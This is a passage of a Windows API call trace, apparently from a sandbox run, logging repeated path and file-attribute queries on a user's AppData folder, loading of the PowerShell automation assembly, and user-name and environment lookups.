GetLastError () returned 0xcb [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\.", nBufferLength=0x105, lpBuffer=0x2ce500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0054.993] GetLastError () returned 0xcb [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0054.993] GetLastError () returned 0xcb [0054.993] SetErrorMode (uMode=0x1) returned 0x1 [0054.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x170fb110, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x190ab5f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x190ab5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.993] GetLastError () returned 0xcb [0054.993] SetErrorMode (uMode=0x1) returned 0x1 [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0054.993] GetLastError () returned 0xcb [0054.993] SetErrorMode (uMode=0x1) returned 0x1 [0054.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x170fb110, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x190ab5f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x190ab5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.993] GetLastError () returned 0xcb [0054.993] SetErrorMode (uMode=0x1) returned 0x1 [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce564, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0054.993] GetLastError () returned 0xcb [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\.", nBufferLength=0x105, lpBuffer=0x2ce500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0054.993] GetLastError () returned 0xcb [0054.994] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0054.994] GetLastError () returned 0xcb [0055.012] SetErrorMode (uMode=0x1) returned 0x1 [0055.012] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0055.012] GetLastError () returned 0xcb [0055.012] SetErrorMode (uMode=0x1) returned 0x1 [0055.012] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0055.012] GetLastError () returned 0xcb [0055.012] SetErrorMode (uMode=0x1) returned 0x1 [0055.012] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0055.012] GetLastError () returned 0xcb [0055.012] SetErrorMode (uMode=0x1) returned 0x1 [0055.012] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x2ce570, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0055.012] GetLastError () returned 0xcb [0055.012] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x2ce50c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0055.012] GetLastError () returned 0xcb [0055.012] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0055.012] GetLastError () returned 0xcb [0055.012] SetErrorMode (uMode=0x1) returned 0x1 [0055.012] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0055.013] GetLastError () returned 0xcb [0055.013] SetErrorMode (uMode=0x1) returned 0x1 [0055.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0055.013] GetLastError () returned 0xcb [0055.013] SetErrorMode (uMode=0x1) returned 0x1 [0055.013] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0055.013] GetLastError () returned 0xcb [0055.013] SetErrorMode (uMode=0x1) returned 0x1 [0055.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x2ce570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0055.013] GetLastError () returned 0xcb [0055.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x2ce50c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0055.013] GetLastError () returned 0xcb [0055.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0055.013] GetLastError () returned 0xcb [0055.013] SetErrorMode (uMode=0x1) returned 0x1 [0055.013] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0055.013] GetLastError () returned 0xcb [0055.013] SetErrorMode (uMode=0x1) returned 0x1 [0055.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0055.013] GetLastError () returned 0xcb [0055.013] SetErrorMode (uMode=0x1) returned 0x1 [0055.013] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0055.013] GetLastError () returned 0xcb [0055.013] SetErrorMode (uMode=0x1) returned 0x1 [0055.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x2ce570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0055.014] GetLastError () returned 0xcb [0055.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.", nBufferLength=0x105, lpBuffer=0x2ce50c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0055.014] GetLastError () returned 0xcb [0055.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0055.014] GetLastError () returned 0xcb [0055.014] SetErrorMode (uMode=0x1) returned 0x1 [0055.014] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19bf9e70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x19bf9e70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0055.014] GetLastError () returned 0xcb [0055.014] SetErrorMode (uMode=0x1) returned 0x1 [0055.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0055.014] GetLastError () returned 0xcb [0055.014] SetErrorMode (uMode=0x1) returned 0x1 [0055.014] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19bf9e70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x19bf9e70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0055.014] GetLastError () returned 0xcb [0055.014] SetErrorMode (uMode=0x1) returned 0x1 [0055.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x2ce570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0055.014] GetLastError () returned 0xcb [0055.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\.", nBufferLength=0x105, lpBuffer=0x2ce50c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0055.014] GetLastError () returned 0xcb [0055.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0055.014] GetLastError () returned 0xcb [0055.014] SetErrorMode (uMode=0x1) returned 0x1 [0055.014] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x170fb110, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x190ab5f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x190ab5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0055.014] GetLastError () returned 0xcb [0055.014] SetErrorMode (uMode=0x1) returned 0x1 [0055.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0055.014] GetLastError () returned 0xcb [0055.014] SetErrorMode (uMode=0x1) returned 0x1 [0055.015] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), fInfoLevelId=0x0, lpFileInformation=0x2ce9dc | out: lpFileInformation=0x2ce9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x170fb110, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x190ab5f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x190ab5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0055.015] GetLastError () returned 0xcb [0055.015] SetErrorMode (uMode=0x1) returned 0x1 [0055.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0055.015] GetLastError () returned 0xcb [0055.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\.", nBufferLength=0x105, lpBuffer=0x2ce50c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0055.015] GetLastError () returned 0xcb [0055.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0055.023] GetLastError () returned 0xcb [0055.023] SetErrorMode (uMode=0x1) returned 0x1 [0055.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), fInfoLevelId=0x0, lpFileInformation=0x2d46ae4 | out: lpFileInformation=0x2d46ae4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x170fb110, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x190ab5f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x190ab5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0055.023] GetLastError () returned 0xcb [0055.023] SetErrorMode (uMode=0x1) returned 0x1 [0055.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.024] GetLastError () returned 0xcb [0055.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce624, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.024] GetLastError () returned 0xcb [0055.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce624, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.024] GetLastError () returned 0xcb [0055.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce624, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.024] GetLastError () returned 0xcb [0055.055] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2cebc8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2cebc8) returned 0x1 [0055.055] GetLastError () returned 0xcb [0055.056] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2cebd0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2cebd0) returned 1 [0055.057] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6783c*="Available", lpRawData=0x2d676f8) returned 1 [0055.057] GetLastError () returned 0x0 [0055.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.057] GetLastError () returned 0xcb [0055.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0055.058] GetLastError () returned 0xcb [0055.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.067] GetLastError () returned 0xcb [0055.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.067] GetLastError () returned 0xcb [0055.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.067] GetLastError () returned 0xcb [0055.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.072] GetLastError () returned 0xcb [0055.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.072] GetLastError () returned 0xcb [0055.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.072] GetLastError () returned 0xcb [0055.072] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0055.072] GetLastError () returned 0xcb [0055.072] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: 